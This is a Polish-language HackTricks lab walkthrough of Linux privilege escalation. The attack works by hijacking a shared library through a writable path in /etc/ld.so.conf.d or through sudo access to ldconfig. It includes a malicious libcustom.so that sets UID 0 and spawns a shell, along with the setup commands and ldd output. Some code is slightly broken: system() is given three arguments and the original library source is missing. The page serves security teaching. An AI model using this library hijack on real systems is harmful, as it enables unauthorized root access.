ld.so privesc exploit example
Reading time: 4 minutes
tip
Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.
Przygotowanie środowiska
W poniższej sekcji znajdziesz kod plików, które zamierzamy użyć do przygotowania środowiska
#include <stdio.h>
#include "libcustom.h"
int main(){
printf("Welcome to my amazing application!\n");
vuln_func();
return 0;
}
- Utwórz te pliki na swoim komputerze w tym samym folderze
- Skompiluj bibliotekę:
gcc -shared -o libcustom.so -fPIC libcustom.c
- Skopiuj
libcustom.so
do/usr/lib
:sudo cp libcustom.so /usr/lib
(uprawnienia roota) - Skompiluj wykonywalny plik:
gcc sharedvuln.c -o sharedvuln -lcustom
Sprawdź środowisko
Sprawdź, czy libcustom.so jest ładowane z /usr/lib i czy możesz wykonać binarny plik.
$ ldd sharedvuln
linux-vdso.so.1 => (0x00007ffc9a1f7000)
libcustom.so => /usr/lib/libcustom.so (0x00007fb27ff4d000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb27fb83000)
/lib64/ld-linux-x86-64.so.2 (0x00007fb28014f000)
$ ./sharedvuln
Welcome to my amazing application!
Hi
Exploit
W tym scenariuszu założymy, że ktoś stworzył podatny wpis w pliku /etc/ld.so.conf/:
sudo echo "/home/ubuntu/lib" > /etc/ld.so.conf.d/privesc.conf
Wrażliwy folder to /home/ubuntu/lib (gdzie mamy dostęp do zapisu).
Pobierz i skompiluj następujący kod w tym katalogu:
//gcc -shared -o libcustom.so -fPIC libcustom.c
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
void vuln_func(){
setuid(0);
setgid(0);
printf("I'm the bad library\n");
system("/bin/sh",NULL,NULL);
}
Teraz, gdy utworzyliśmy złośliwą bibliotekę libcustom w źle skonfigurowanej ścieżce, musimy poczekać na ponowne uruchomienie lub na to, aż użytkownik root wykona ldconfig
(jeśli możesz wykonać ten plik binarny jako sudo lub ma bit suid, będziesz mógł go wykonać samodzielnie).
Gdy to nastąpi, sprawdź ponownie, skąd wykonywalny plik sharevuln
ładuje bibliotekę libcustom.so
:
$ldd sharedvuln
linux-vdso.so.1 => (0x00007ffeee766000)
libcustom.so => /home/ubuntu/lib/libcustom.so (0x00007f3f27c1a000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f3f27850000)
/lib64/ld-linux-x86-64.so.2 (0x00007f3f27e1c000)
Jak widać, ładowanie odbywa się z /home/ubuntu/lib
i jeśli jakikolwiek użytkownik to uruchomi, zostanie uruchomiona powłoka:
$ ./sharedvuln
Welcome to my amazing application!
I'm the bad library
$ whoami
ubuntu
note
Zauważ, że w tym przykładzie nie podnieśliśmy uprawnień, ale modyfikując wykonywane polecenia i czekając na to, aż root lub inny użytkownik z uprawnieniami wykona podatny plik binarny, będziemy w stanie podnieść uprawnienia.
Inne błędne konfiguracje - Ta sama podatność
W poprzednim przykładzie sfałszowaliśmy błędną konfigurację, w której administrator ustawił folder bez uprawnień w pliku konfiguracyjnym w /etc/ld.so.conf.d/
.
Jednak istnieją inne błędne konfiguracje, które mogą powodować tę samą podatność, jeśli masz uprawnienia do zapisu w jakimś pliku konfiguracyjnym w /etc/ld.so.conf.d
, w folderze /etc/ld.so.conf.d
lub w pliku /etc/ld.so.conf
, możesz skonfigurować tę samą podatność i ją wykorzystać.
Exploit 2
Załóżmy, że masz uprawnienia sudo do ldconfig
.
Możesz wskazać ldconfig
, skąd ładować pliki konfiguracyjne, więc możemy to wykorzystać, aby ldconfig
załadował dowolne foldery.
Więc stwórzmy pliki i foldery potrzebne do załadowania "/tmp":
cd /tmp
echo "include /tmp/conf/*" > fake.ld.so.conf
echo "/tmp" > conf/evil.conf
Teraz, jak wskazano w poprzednim exploicie, stwórz złośliwą bibliotekę w /tmp
.
A na koniec załadujmy ścieżkę i sprawdźmy, skąd binarny plik ładuje bibliotekę:
ldconfig -f fake.ld.so.conf
ldd sharedvuln
linux-vdso.so.1 => (0x00007fffa2dde000)
libcustom.so => /tmp/libcustom.so (0x00007fcb07756000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcb0738c000)
/lib64/ld-linux-x86-64.so.2 (0x00007fcb07958000)
Jak widać, mając uprawnienia sudo do ldconfig
, możesz wykorzystać tę samą lukę.
tip
Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.